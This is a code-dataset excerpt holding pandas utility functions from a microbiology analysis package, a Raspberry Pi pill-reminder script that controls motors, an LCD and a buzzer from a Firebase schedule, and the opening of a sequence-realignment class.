import pdb; pdb.set_trace()\n del df_result[col]\n df_result[column] = values\n df_result = unifyNullValues(df_result)\n return df_result\n\ndef unifyNullValues(df_value):\n \"\"\"\n Makes all null df_value cn.NONE.\n :param pd.DataFrame df_value:\n :return pd.DataFrame:\n \"\"\"\n return df_value.fillna(value=np.nan)\n #return df_value.applymap(lambda v: cn.NONE if isNull(v) else v)\n\ndef pruneNullRows(df):\n \"\"\"\n Removes rows that are all nulls.\n :param pd.DataFrame df:\n This is done in place to avoid storage problems with large dataframes.\n :return pd.DataFrame:\n \"\"\"\n return df.dropna(axis=0, how='all')\n\ndef pruneRowsWithNullColumns(df, columns):\n \"\"\"\n Deletes rows where there is a null value in any of a list\n of columns.\n :param pd.DataFrame df:\n :param list-of-str colums:\n :return pd.DataFrame:\n \"\"\"\n def check(row):\n return not any([isNull(row[c]) for c in columns])\n #\n sel = df.apply(check, axis=1)\n return pd.DataFrame(df.loc[sel])\n\ndef coerceDF(df):\n \"\"\"\n Coerces the columns to their type if the type is known.\n :param pd.DataFrame df:\n :return pd.DataFrame:\n \"\"\"\n df_result = df.copy(deep=True)\n for column in df_result.columns:\n try:\n schema 
= cn.TABLE_SCHEMAS.column_schemas.getSchema(column)\n if schema.data_type in [float, int, bool]:\n df_result[column] = pd.to_numeric(df_result[column])\n # Get an exception if the column type is unknown\n except ValueError:\n pass\n return df_result\n\ndef appendUnique(values, value):\n \"\"\"\n Adds value to values if it is not already present.\n :param list-of-object values:\n :param object value:\n :return list-of-object:\n \"\"\"\n new_values = list(values)\n if not value in new_values:\n new_values.append(value)\n return new_values\n\ndef mergeLeft(df1, df2, merge_column):\n \"\"\"\n Does a left join properly handling null values (which pandas does not do).\n :param pd.DataFrame df1: left dataframe\n :param pd.DataFrame df2:\n :param str merge_column: column on which the merge is done\n :return pd.DataFrame:\n Assumes that the only overlap in column names is the merge_column\n \"\"\"\n overlaps = set(df1.columns).intersection(df2.columns)\n if overlaps != set([merge_column]):\n raise ValueError (\"Must only have the merge column in common!\")\n # Find the null values on the left\n sel = [not x for x in df1[merge_column].isnull()]\n df_left = df1[sel]\n # Merge non-null values\n df_result = df_left.merge(df2, on=merge_column, how='left')\n # Include the omitted rows as null columns\n sel = [x for x in df1[merge_column].isnull()]\n df_null = df1[sel].copy()\n for column in df2.columns:\n if column != merge_column:\n df_null[column] = cn.NONE\n # Add the missing rows\n df_result = pd.concat([df_result, df_null], sort=True)\n # Finalize result\n cleanDF(df_result)\n return df_result\n\ndef unpivot(df, label_column='label', value_column='value'):\n \"\"\"\n Converts a pivoted dataframe into one with a column\n of labels.\n :param pd.DataFrame: DF with values in cells and value\n labels in columns\n :param str label_column: name of the label column on output\n :param str value_column: name of the value column on output\n :return pd.DataFrame: label_column, value_column\n \"\"\"\n return pd.melt(df, var_name=label_column, value_vars=df.columns,\n value_name=value_column)\n\ndef makeMatrix(df, \n row_name=cn.KEY_ISOLATE,\n column_name=cn.KEY_MUTATION, \n value_name=cn.COUNT,\n default_value=0.0,\n ):\n \"\"\"\n Creates a data matrix that consists of only a column of\n row names, a column of column name, and a column of values.\n :param pd.DataFrame df:\n :param str row_name: name of the column in df used for row values\n :param str column_name: name of column whose values are used\n as column names in the matrix\n :param str value_name: name of the column from which values\n are obtained.\n :param float default_value: used for missing values\n \"\"\"\n df_sub = df[[row_name, column_name, value_name]].copy()\n df_sub.drop_duplicates(inplace=True)\n sel = df_sub.apply(\n lambda r: (not isNull(r[column_name]))\n and (not isNull(r[row_name])),\n axis=1\n )\n df_sub = df_sub.loc[sel]\n df_result = df_sub.pivot_table(index=row_name, columns=column_name, values=value_name)\n df_result = df_result.applymap(lambda x: 0 if isNull(x) else x)\n return df_result\n\ndef set2list(aSet):\n return [x for x in aSet]\n\ndef removeDuplicatesFromList(values):\n \"\"\"\n Trims the list to remove duplicates. 
List elements\n may be a string or a list of strings or int.\n Order is not preserved.\n :param list-of-str or list-of-list-of-other values:\n :return list-of-inputtype:\n \"\"\"\n if isStr(values[0]) or isNumber(values[0]):\n new_values = set(values)\n return set2list(new_values)\n else:\n df = pd.DataFrame(values)\n df = df.drop_duplicates()\n results = []\n for _,row in df.iterrows():\n results.append([v for v in row.to_dict().values()])\n return results\n\ndef getParentClass(cls):\n return cls.__bases__[0]\n\ndef normalizedMean(values, max_std):\n \"\"\"\n Computes the mean of values adjusted by their standard deviation.\n :param list-of-number values:\n :param float max_std:\n :return float:\n \"\"\"\n trimmed_values = trimExtremeValues(values, max_std)\n std = np.std(trimmed_values)\n if np.isclose(std, 0):\n return 0.0\n return np.mean([v/std for v in trimmed_values])\n\ndef trimExtremeValues(values, max_std):\n \"\"\"\n Returns a list that has values no large than max_std.\n :param list-of-number values:\n :param float max_std:\n :return list-of-number:\n \"\"\"\n std = np.std(values)\n if np.isclose(std, 0):\n return values\n normalized_values = [v/std for v in values]\n pairs = zip(values, normalized_values)\n return [v for v,z in pairs if abs(z) <= max_std]\n\ndef selectRows(df, constraints):\n \"\"\"\n Finds a subset of the original DataFrame.\n :param pd.DataFrame df:\n :param list-of-BooleanFunction constraints: \n A boolean function of a row of df_culture_isolate_mutation.\n :return pd.DataFrame:\n \"\"\"\n constraints = setNoneList(constraints)\n def checkConstraint(row):\n is_included = True\n for func in constraints:\n if not func(row):\n is_included = False\n break\n return is_included\n #\n sel = df.apply(checkConstraint, axis=1)\n df_result = df.loc[sel].copy(deep=True)\n df_result.drop_duplicates(inplace=True)\n return df_result\n\ndef isColinear(df_X):\n \"\"\"\n Determines if there is a colinearity in the X matrix.\n :param pd.DataFrame df_X: X matrix in linear regression\n :return bool:\n \"\"\"\n pseudo_inverse = np.dot(df_X.transpose(), df_X)\n det = np.linalg.det(pseudo_inverse)\n is_colinear = np.abs(det) < SMALL_DETERMINANT\n return is_colinear\n\ndef findRowColumn(df, predicate):\n \"\"\"\n Returns index, column tuples whose value satisfies a predicate.\n :param pd.DataFrame df:\n :param UnaryBooleanFunction predicate:\n :return list-of-tuple:\n \"\"\"\n result = []\n for index in df.index:\n for column in df.columns:\n if predicate(df.loc[index, column]):\n result.append((index, column))\n return result\n\ndef aggregateColumns(df, columns, aggregateFunc, sep=\"--\"):\n \"\"\"\n Creates a new column that that is an aggregation of existing columns.\n The old column is deleted. 
The new column is named\n as the concatenation of old columns separated by the separator.\n :param pd.DataFrame df:\n :param list-str columns:\n :param Function aggregateFunc: arg is dataframe; returns Series\n :return str: name of the new column\n \"\"\"\n df_sub = df[list(columns)]\n merged = aggregateFunc(df_sub)\n for col in columns:\n del df[col]\n str_columns = [str(c) for c in columns]\n new_column = sep.join(str_columns)\n df[new_column] = merged\n return new_column\n\ndef findCorrelatedColumns(df, min_corr=0.99):\n \"\"\"\n Forms groups of columns based on their correlations.\n :param pd.DataFrame df: Dataframe whose columns are analyzed\n :param float min_corr: minimum correlation for two mutations to be equivalent\n :return list-list-columns: List of columns that are correlated.\n \"\"\"\n df_corr = df.corr()\n relation = lambda m1, m2: df_corr.loc[m1, m2] >= min_corr\n equiv = EquivalenceClass(df, relation)\n equiv.do()\n equiv.validate() # Verify that the relations hold for groups\n classes = [c for c in equiv.classes if len(c) > 1]\n return classes\n\ndef isIterable(values):\n return \"__iter__\" in dir(values)\n\ndef selectColumns(df, constraint):\n \"\"\"\n Selects a subset of the columns in a dataframe.\n :param pd.DataFrame df:\n :param BooleanFunction constraint: Boolean Function of column name\n :return pd.DataFrame:\n \"\"\"\n columns = [c for c in df.columns if constraint(c)]\n return df[columns].copy()\n\ndef correlateWithPredictors(df_X, df_y):\n \"\"\"\n Constructs the correlation of each predictor with a dependent\n variable.\n :param pd.DataFrame df_X: columns of predictor variables\n :param pd.DataFrame df_y: dependent variable\n :return pd.DataFrame: cn.VALUE, indexed by df_column, ordered\n by descending absolute value of correlation\n \"\"\"\n df = df_X.copy()\n df[cn.DEPVAR] = df_y.iloc[:,0]\n df_corr = df.corr()\n df_corr = df_corr.applymap(lambda v: abs(v))\n df_result = pd.DataFrame(df_corr[cn.DEPVAR])\n df_result = df_result.drop([cn.DEPVAR])\n df_result = df_result.sort_values(cn.DEPVAR, ascending=False)\n return df_result\n\ndef appendWithColumnUnion(df1, df2, fill_value=0.0):\n \"\"\"\n Appends the two dataframes, adding columns if needed.\n :param pd.DataFrame df1:\n :param pd.DataFrame df2:\n :param float default_value: fill value used for added columns\n \"\"\"\n def addColumns(df, columns):\n for col in columns:\n df[col] = fill_value\n #\n columns1 = set(df1.columns)\n columns2 = set(df2.columns)\n add_columns1 = columns2.difference(columns1)\n add_columns2 = columns1.difference(columns2)\n #\n df1_new = df1.copy()\n df2_new = df2.copy()\n #\n addColumns(df1_new, add_columns1)\n addColumns(df2_new, add_columns2)\n df_result = df1_new.append(df2_new)\n #\n df_result.index = range(len(df_result))\n return df_result\n\ndef makeProjectedPredictor(df_X, df_x):\n \"\"\"\n Computes the residuals of df_x regressed on df_X and\n returns a matrix that augments df_X with these residuals.\n :param pd.DataFrame df_X:\n :param pd.DataFrame df_x:\n :return pd.DataFrame:\n \"\"\"\n MIN_SCORE = 0.05 # Minim score to use the residuals\n model = linear_model.LinearRegression(fit_intercept=False, \n copy_X=True)\n if isinstance(df_x, pd.Series):\n df_x = pd.DataFrame(df_x)\n name = df_x.columns[0]\n if isColinear(df_X):\n df_res = df_x\n else:\n model.fit(df_X, df_x)\n df_res = pd.DataFrame({\n name: [v[0] for v in model.predict(df_X)],\n })\n score = model.score(df_X, df_x)\n if score < MIN_SCORE:\n df_res = df_x\n else:\n df_res = pd.DataFrame(df_x[name] - 
df_res[name])\n df_res = df_res.applymap(lambda v: 0.0 if np.isnan(v) else v)\n df_result = df_X.copy()\n df_result[name] = df_res[name]\n return df_result\n\ndef makeProjectedPredictors(df_X):\n \"\"\"\n Computes the residuals of the regression of successive columns\n on preceeding columns.\n :param pd.DataFrame df_X:\n :return pd.DataFrame:\n \"\"\"\n columns = df_X.columns.tolist()\n df_result = pd.DataFrame(df_X[columns[0]])\n columns = columns[1:]\n for col in columns:\n df = makeProjectedPredictor(df_result, df_X[col])\n df_result[col] = df[col]\n return df_result\n\ndef extendBin(bnum, length):\n \"\"\"\n :param str bnum: binary number or integer\n :param int length:\n :return list-str: binary number with leading zeros\n \"\"\"\n if not isinstance(bnum, str):\n bnum = bin(bnum)\n result = list(bnum)[2:]\n while len(result) < length:\n result.insert(0, '0')\n return result\n\ndef addBinColumn(df):\n \"\"\"\n For a dataframe with columns that are binary values,\n adds a column that is the binary number for that column.\n On return, df has a column cn.VALUE that is the decimal\n number for the binary value.\n :param pd.DataFrame df:\n \"\"\"\n binaries = []\n columns = df.columns\n dff = df.copy()\n for col in dff.columns:\n dff = dff.rename(columns={col: str(col)})\n for _, row in dff.iterrows():\n binary = '0b'\n for col in dff.columns:\n binary = binary + str(int(row[col]))\n binaries.append(int(binary, 2))\n df[cn.VALUE] = binaries\n\ndef getFirstColumn(df):\n \"\"\"\n :param pd.DataFrame df:\n :return list-object: first column of df\n \"\"\"\n return df[df.columns[0]].tolist()\n\ndef nCr(n, r):\n \"\"\"\n Number of combinations of a set of size n of distinct objects\n choosing r objects.\n :param int n:\n :param int r:\n :return int:\n \"\"\"\n result = math.factorial(n) \\\n / math.factorial(n-r) / math.factorial(r)\n return result\n\ndef findKey(df, required_columns=None, max_size=4):\n \"\"\"\n Finds a key for the dataframe.\n :param pd.DataFrame df:\n :param list-str required_columns: Columns to include in the key\n \"\"\"\n length = len(df.drop_duplicates())\n required_columns = setNoneList(required_columns)\n columns = df.columns.tolist()\n for col in required_columns:\n columns.remove(col)\n combinator = combination_iterator.CombinationIterator(columns,\n max_size)\n keys = []\n for new_columns in combinator:\n new_columns.extend(required_columns)\n if len(df[new_columns].drop_duplicates()) == length:\n keys = new_columns\n break\n return keys\n \ndef makeGeneDescriptionDF(ggene_ids):\n \"\"\"\n Creates a dataframe of descriptions.\n :param list-of-str ggene_ids: values in cn.GGENE_ID\n :return pd.DataFrame: cn.GGENE_ID, GENE_DESC\n \"\"\"\n quoted_list = str([\"%s\" % str(g) for g in ggene_ids])\n in_list = quoted_list.replace(\"[\", \"\")\n in_list = in_list.replace(\"]\", \"\")\n query = '''\n select distinct gene_id, ggene_id, gene_desc\n from genotype \n where gene_id = ggene_id and ggene_id in (%s)\n ''' % in_list\n df = readSQL(query)\n return df\n\ndef getIsolatesFromIndices(indices):\n \"\"\"\n Extracts the isolates from the indices of a df_X.\n :param pandas.index indices: \n cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP\n :return dict: keyed by cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP\n values correspond to rows element in the index\n \"\"\"\n keys = [n for n in indices.names]\n result = {}\n for idx, key in enumerate(keys):\n result[key] = [v[idx] for v in indices.values]\n return result\n\ndef makeDataframeFromXlsx(path, sheet_no=0):\n \"\"\"\n Creates a dataframe from 
an xlsx file in a data directory\n  :param str path: Path to data files\n  :param int sheet_no: Number of the worksheet\n  \"\"\"\n  data = pd.ExcelFile(path)\n  return data.parse(sheet_no)\n\ndef getRootDataDirectory():\n  return getPath([getIdentifiedDirectory(), DATA_DIR], None)\n\ndef getIdentifiedDirectory(key_directory=None):\n  \"\"\"\n  Finds the directory that contains the specified directory.\n  :return str: path to top folder of enclosed project\n  \"\"\"\n  if key_directory is None:\n    directories = DATA_DIRECTORIES\n  else:\n    directories = set([key_directory])\n  curdir = os.getcwd()\n  paths = []\n  while len(curdir) > 1:\n    paths.append(curdir)\n    curdir = os.path.split(curdir)[0]\n  paths.reverse()\n  for path in paths:\n    if len(directories.intersection(os.listdir(path))) > 0:\n      return path\n  raise ValueError(\"%s not found.\" % key_directory)\n\ndef makeNormalizedData(df_denormalized):\n  \"\"\"\n  Creates a set of normalized dataframes that correspond to\n  the denormalized data for genotype_phenotype data.\n  :param pd.DataFrame df_denormalized: \n      See constants.TABLES_GENOTYPE_PHENOTYPE\n  :return NormalizedData:\n  \"\"\"\n  normalized_data = NormalizedData()\n  for table_name in TABLES_GENOTYPE_PHENOTYPE:\n    schema = cn.TABLE_SCHEMAS.getSchema(table_name)\n    df = df_denormalized[schema.columns].copy()\n    normalized_data[schema.name] = df.drop_duplicates()\n  return normalized_data\n\ndef makeDenormalizedDF(normalized_data):\n  \"\"\"\n  Creates a denormalized dataframe by joining the normalized tables.\n  :param NormalizedData normalized_data:\n  :return pd.DataFrame: has schema of TABLE_CULTURE_ISOLATE_MUTATION\n  \"\"\"\n  def mergeDF(table1, table2, table_link, columns):\n    df1 = normalized_data[table1].merge(normalized_data[table_link],\n        on=columns[0], how='inner')\n    df2 = df1.merge(normalized_data[table2],\n        on=columns[1], how='inner')\n    df = df2.drop_duplicates()\n    return df\n  #\n  df_im = mergeDF(cn.TABLE_MUTATION, cn.TABLE_ISOLATE,\n      cn.TABLE_ISOLATE_MUTATION_LINK,\n      [cn.KEY_MUTATION, cn.KEY_ISOLATE])\n  df_ci = normalized_data[cn.TABLE_CULTURE].merge(\n      normalized_data[cn.TABLE_CULTURE_ISOLATE_LINK], \n      on=cn.KEY_CULTURE, how=\"inner\")\n  df = df_im.merge(df_ci, on=cn.KEY_ISOLATE, how=\"inner\")\n  df = df.merge(normalized_data[cn.TABLE_GENE_DESCRIPTION], \n      on=cn.GENE_ID, how=\"inner\")\n  return df\n  \n\n\n################# CLASSES ####################\nclass NormalizedData(dict):\n  \"\"\"\n  Container of tables for Normalized Data.\n  Has keys for TABLES_GENOTYPE_PHENOTYPE\n  \"\"\"\n  pass\n","repo_name":"ScienceStacks/microbepy","sub_path":"microbepy/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":33902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9790692082","text":"#Pill Reminder, Capstone 2\n#Jeffrey R. 
Cruz Rodriguez = S00914944\n#Darel Diaz Ramos = S01045655\n\nimport RPi.GPIO as GPIO\nimport time\nfrom time import sleep\nfrom Adafruit_CharLCD import Adafruit_CharLCD\nfrom firebase import firebase\nimport schedule \n\nGPIO.setmode(GPIO.BCM)\n\nfirebase = firebase.FirebaseApplication('https://pillreminder2-c8807.firebaseio.com/',None)\n\n\nlcd = Adafruit_CharLCD(rs=26,en=19,\n\t\td4=13, d5=6,d6=5,d7=11,\n\t\tcols=16,lines=2)\nlcd.clear()\n\n\nControlPin = [4,17,21,22]\n\nControlPin2 = [22,21,17,4]\n\n\n\nControlPin3 = [12,16,20,21]\n\nControlPin4 = [21,20,16,12]\n\n\n\nControlPin5 = [18,24,25,8]\n\nControlPin6 = [8,25,24,18]\n\n\n\nphotores = 23\n\nphotores2 = 10\n\nphotores3 = 9\n\nbuzzer = 3\n\nGPIO.setup(buzzer,GPIO.OUT)\n\nGPIO.output(buzzer,GPIO.LOW)\n\n\nplease = firebase.get('/Current Schedule/Darel Diaz/Hours1',None)\n\npilltime2= int(please)\n\nplease2 = firebase.get('/Current Schedule/Darel Diaz/Hours2',None)\n\npilltime3= int(please2)\n\nplease3 = firebase.get('/Current Schedule/Darel Diaz/Hours3',None)\n\npilltime4= int(please3)\n\ndef buzzer_beep():\n\tGPIO.output(buzzer,GPIO.HIGH)\n\tsleep(2)\n\tGPIO.output(buzzer,GPIO.LOW)\n\tsleep(2)\ndef buzzer_off():\n\tGPIO.output(buzzer,GPIO.LOW)\n\ndef quantity():\n\tquant = firebase.get('/Current Schedule/Darel Diaz/Qty1', None)\n\tquantity = int(quant)\n\n\treturn quantity\n\ndef quantity2():\n\tquant2 = firebase.get('/Current Schedule/Darel Diaz/Qty2', None)\n\tquantity2 = int(quant2)\n\n\treturn quantity2\n\ndef quantity3():\n\tquant3 = firebase.get('/Current Schedule/Darel Diaz/Qty3', None)\n\tquantity3 = int(quant3)\n\n\treturn quantity3\n\ndef Update_Capstone():\n\n\tpillhour = firebase.get('/Current Schedule/Darel Diaz/Hours1',None)\n\n\tpilltime = int(pillhour)\n\n\treturn pilltime\n\ndef Update_Capstone2():\n\n\tpillhour2 = firebase.get('/Current Schedule/Darel Diaz/Hours2',None)\n\n\tpilltime22 = int(pillhour2)\n\n\treturn pilltime22\n\ndef Update_Capstone3():\n\n\tpillhour3 = firebase.get('/Current Schedule/Darel Diaz/Hours3',None)\n\n\tpilltime33 = int(pillhour3)\n\n\treturn pilltime33\n\n\ndef rc_time(photores):\n\tcount=0\n\tGPIO.setup(photores,GPIO.OUT)\n\tGPIO.output(photores,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores,GPIO.IN)\n\n\twhile (GPIO.input(photores) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef rc_time2(photores2):\n\tcount=0\n\tGPIO.setup(photores2,GPIO.OUT)\n\tGPIO.output(photores2,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores2,GPIO.IN)\n\n\twhile (GPIO.input(photores2) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef rc_time3(photores3):\n\tcount=0\n\tGPIO.setup(photores3,GPIO.OUT)\n\tGPIO.output(photores3,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores3,GPIO.IN)\n\n\twhile (GPIO.input(photores3) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef motor1_up():\n\tfor pin in ControlPin:\n\t\tGPIO.setup(pin,GPIO.OUT)\n\t\tGPIO.output(pin,0)\n\n\tseq= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin in range(4):\n\t\t\t\tGPIO.output(ControlPin[pin], seq[halfstep][pin])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror1_down():\n\n\tfor pin2 in ControlPin2:\n\t\t\tGPIO.setup(pin2,GPIO.OUT)\n\t\t\tGPIO.output(pin2,0)\n\n\tseq2 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in 
range(8):\n\t\t\tfor pin2 in range(4):\n\t\t\t\tGPIO.output(ControlPin2[pin2], seq2[halfstep][pin2])\n\t\t\ttime.sleep(0.001)\n\n\n\ndef motor2_up():\n\tfor pin3 in ControlPin3:\n\t\tGPIO.setup(pin3,GPIO.OUT)\n\t\tGPIO.output(pin3,0)\n\n\tseq3= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin3 in range(4):\n\t\t\t\tGPIO.output(ControlPin3[pin3], seq3[halfstep][pin3])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror2_down():\n\n\tfor pin4 in ControlPin4:\n\t\t\tGPIO.setup(pin4,GPIO.OUT)\n\t\t\tGPIO.output(pin4,0)\n\n\tseq4 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin4 in range(4):\n\t\t\t\tGPIO.output(ControlPin4[pin4], seq4[halfstep][pin4])\n\t\t\ttime.sleep(0.001)\n\n\n\ndef motor3_up():\n\tfor pin5 in ControlPin5:\n\t\tGPIO.setup(pin5,GPIO.OUT)\n\t\tGPIO.output(pin5,0)\n\n\tseq5= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin5 in range(4):\n\t\t\t\tGPIO.output(ControlPin5[pin5], seq5[halfstep][pin5])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror3_down():\n\n\tfor pin6 in ControlPin6:\n\t\t\tGPIO.setup(pin6,GPIO.OUT)\n\t\t\tGPIO.output(pin6,0)\n\n\tseq6 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin6 in range(4):\n\t\t\t\tGPIO.output(ControlPin6[pin6], seq6[halfstep][pin6])\n\t\t\ttime.sleep(0.001)\n\n\t\t\n\ndef capstone():\n\n\t\n\tmoror1_down()\n\n\tmessage_motor1 = firebase.get('/Current Schedule/Darel Diaz/Name1',None)\n\tmessage2_motor1 = firebase.get('/Current Schedule/Darel Diaz/Dose1',None)\n\n\tDose = int(message2_motor1)\n\n#/////////////////////////////////1\n\t\n\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor1 + \"\\n\" + \"Take: \" + message2_motor1 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores) > 30000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor1_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty = 0 \n\t\tqty = quantity()\n\t\tnewqty = qty - Dose\n\n\t\tstrqty = str(newqty)\n\n\t\tif newqty <= Dose:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew = str(newqty)\n\t\t\tlcd.message(\"You have \" + new + \"pills\" + \"\\n\" + \"of\" + message_motor1)\n\n\t\t#datatest = {\"Qty1\": newqty}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty1\", strqty)\n\n\t\tmotor1_up()\n\n\t\tlcd.clear()\n\t\t#///////////////////////////2\n\n\t\t\n\ndef capstone2():\n\n\tmoror2_down()\n\n\tmessage_motor2 = firebase.get('/Current Schedule/Darel Diaz/Name2',None)\n\tmessage2_motor2 = firebase.get('/Current Schedule/Darel Diaz/Dose2',None)\n\n\tDose2 = int(message2_motor2)\n\n#/////////////////////////////////1\n\t\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor2 + \"\\n\" + \"Take: \" + message2_motor2 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores2) > 
30000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor2_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty2 = 0 \n\t\tqty2 = quantity2()\n\t\tnewqty2 = qty2 - Dose2\n\n\t\tstrqty2 = str(newqty2)\n\n\t\tif newqty2 <= Dose2:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew2 = str(newqty2)\n\t\t\tlcd.message(\"You have \" + new2 + \"pills\" + \"\\n\" + \"of\" + message_motor2)\n\n\t\t#datatest2 = {\"Qty2\": newqty2}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty2\", strqty2)\n\n\t\tmotor2_up()\n\n\t\tlcd.clear()\n\t\t#///////////////////////////2\n\n\t\n\t\t\n\n\ndef capstone3():\n\n\tmoror3_down()\n\n\tmessage_motor3 = firebase.get('/Current Schedule/Darel Diaz/Name3',None)\n\tmessage2_motor3 = firebase.get('/Current Schedule/Darel Diaz/Dose3',None)\n\n\tDose3 = int(message2_motor3)\n\n#/////////////////////////////////1\n\t\n\t\n\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor3 + \"\\n\" + \"Take: \" + message2_motor3 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores3) > 20000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor3_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty3 = 0 \n\t\tqty3 = quantity3()\n\t\tnewqty3 = qty3 - Dose3\n\n\t\tstrqty3 = str(newqty3)\n\n\t\tif newqty3 <= Dose3:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew3 = str(newqty3)\n\t\t\tlcd.message(\"You have \" + new3 + \"pills\" + \"\\n\" + \"of\" + message_motor3)\n\n\t\t#datatest3 = {\"Qty3\": newqty3}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty3\", strqty3)\n\n\t\tmotor3_up()\n\n\t\tlcd.clear()\n\n\n\ndef conv(pleaseetime):\n\n\tnewtime = pleaseetime * 3600\n\n\treturn newtime\n\n\n\nwhile True:\n\n\t#time.sleep(conv(pilltime2))\n\ttime.sleep(pilltime2)\n\tcapstone()\n\n\ttime.sleep(pilltime3 - pilltime2)\n\tcapstone2()\n\n\tif(pilltime4 == pilltime2 == pilltime3):\n\t\tcapstone3()\n\n\telse:\n\t\ttime.sleep(pilltime4 - pilltime3)\n\t\tcapstone3()\n\n\tpilltime2 = Update_Capstone()\n\tpilltime3 = Update_Capstone2()\n\tpilltime4 = Update_Capstone3()\n","repo_name":"jeffcruz217/Capstone","sub_path":"CapstoneScript.py","file_name":"CapstoneScript.py","file_ext":"py","file_size_in_byte":8593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37161253599","text":"import os\nimport subprocess\n\n\nclass Realigner:\n def __init__(self, output_path, visualization_path):\n self.output_path = output_path\n self.visualization_path = visualization_path\n # TODO: Move all this to initialize.py\n if not os.path.exists(os.path.join(self.output_path, \"fasta_indexed\")):\n os.makedirs(os.path.join(self.output_path, \"fasta_indexed\"))\n if not os.path.exists(os.path.join(self.output_path, \"bam\")):\n os.makedirs(os.path.join(self.output_path, \"bam\"))\n if not os.path.exists(os.path.join(self.visualization_path, \"cram\")):\n os.makedirs(os.path.join(self.visualization_path, \"cram\"))\n if not os.path.exists(os.path.join(self.output_path, \"bam_sorted\")):\n os.makedirs(os.path.join(self.output_path, \"bam_sorted\"))\n if not os.path.exists(os.path.join(self.output_path, \"logs\")):\n os.makedirs(os.path.join(self.output_path, \"logs\"))\n\n 
